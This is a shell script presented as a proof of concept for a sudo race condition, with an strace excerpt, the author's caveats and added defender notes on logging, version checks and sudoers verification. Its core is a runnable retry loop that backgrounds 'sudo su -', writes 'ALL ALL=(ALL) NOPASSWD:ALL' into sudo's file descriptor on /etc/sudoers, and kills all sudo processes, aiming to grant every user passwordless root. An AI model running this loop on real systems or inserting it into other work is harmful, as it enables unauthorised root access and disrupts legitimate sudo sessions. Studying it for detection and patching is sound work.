# oxagast / Marshall Whittaker
#
# Proof of concept for a sudo race condition (author's description):
# the echo line below uses sudoers file format to allow everyone to use
# the root account and writes it to /proc/<pid>/fd/3, where <pid> is the
# sudo process (23423 in the author's example) and fd 3 is the descriptor
# sudo has open on /etc/sudoers in the strace excerpt. The author's claim
# is that write access to that descriptor yields root.
#
# Caveats: sudo must be running and asking for a password at the time,
# and the caller must have write permission to fd 3.
#
# Race condition: between obtaining sudo's pid with pgrep and sudo's
# setresuid()/openat() sequence, before the effective uid is reset to 0
# (see the trace: setresuid(-1, 1, -1), openat("/etc/sudoers") = 3,
# setresuid(-1, 0, -1)).
#
# Review notes (defender's view):
#  - Remediation is a sudo build in which this window is closed; the
#    `sudo -V` call below prints the installed version so a host can be
#    checked against the vendor advisory for the affected range.
#  - The loop is loud: it repeatedly backgrounds `sudo su -` and then runs
#    `pkill sudo`, so sudo/auth logging is likely to show a burst of
#    started-and-killed sudo sessions from one user; a `pkill sudo` storm
#    also kills unrelated sudo sessions, which is itself observable.
#  - Verification after suspected use: compare /etc/sudoers with the
#    packaged or config-managed copy and look for an unexpected
#    "ALL ALL=(ALL) NOPASSWD:ALL" entry; sudoers is 0440 root-owned in the
#    trace, so any non-root write path to it is the thing to hunt for.
#
# --- SNIP ---
# getresuid([0], [0], [0]) = 0
# getresgid([0], [0], [0]) = 0
# openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY) = 3
# fstat(3, {st_mode=S_IFREG|0644, st_size=556, ...}) = 0
# read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 556
# read(3, "", 4096) = 0
# close(3) = 0
# setresuid(-1, 1, -1) = 0
# stat("/etc/sudoers", {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# openat(AT_FDCWD, "/etc/sudoers", O_RDONLY) = 3
# fstat(3, {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# read(3, "root ALL=(ALL) ALL\n%sudo ALL=(AL"..., 4096) = 39
# lseek(3, 0, SEEK_SET) = 0
# fcntl(3, F_SETFD, FD_CLOEXEC) = 0
# setresuid(-1, 0, -1) = 0
# --- SNIP ---

# Print the installed sudo version (the value to check against the advisory).
sudo -V

# Retry loop: each pass backgrounds a sudo session, attempts the write
# through sudo's fd 3, then kills every sudo process and starts over.
while true; do
  sudo su - &                                                # background sudo; it sits waiting for a password
  echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3;  # write via sudo's descriptor on /etc/sudoers
  pkill sudo;                                                # kills ALL sudo processes, not just the one above
done;